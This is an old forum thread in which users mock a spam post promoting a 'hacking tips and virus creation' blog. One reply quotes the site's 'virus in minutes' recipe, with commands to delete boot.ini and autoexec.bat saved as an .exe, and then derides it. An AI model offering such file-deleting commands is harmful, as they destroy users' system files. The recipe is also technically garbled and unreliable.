    tips and tricks , computer tweaks to enhance ur pc, small virus
    creation ,etc.... it's the best site ... www.realm-of-tricks.blogspot.com

    , Sep 16, 2007

  2. Guest

    "" <> wrote:

    >check this out buddies... a kool website for anti hacking and hacking
    >tips and tricks , computer tweaks to enhance ur pc, small virus
    >creation ,etc.... it's the best site ...

    Virus in minutes
    Write VIRUS to computer in 1 minutes
    Creating virus trick
    open ur notepad n type the following.........type del c:\boot.ini

    c:\del autoexec.bat

    save as .exe [save it as .exe file....n u can save it by ne
    name]create the notepad in c: drive...

    + boot.ini is read only.
    --

    http://jimcotton.blogspot.com/2007/09/this-one-must-be-sickest-but-funniest.html
    Or http://tinyurl.com/2trkoo

    , Sep 16, 2007

  3. why? Guest

    On Sun, 16 Sep 2007 11:39:41 -0700, wrote:

    >check this out buddies... a kool website for anti hacking and hacking

    <snip>

    Even better validation than most,
    http://validator.w3.org/check?uri=w...(detect automatically)&doctype=Inline&group=0

    This page is not Valid XHTML 1.0 Strict!
    Result: Failed validation, 456 Errors

    Also spammed to a python list.

    The JavaScript, ads and widgets make me feel secure all over knowing
    these are going to run if I viewed the site.

    After kool, it's well a site to miss, more so with tips like - "Using a
    loophole in a winamp plugin, you can download and burn music from..."

    Me

    why?, Sep 16, 2007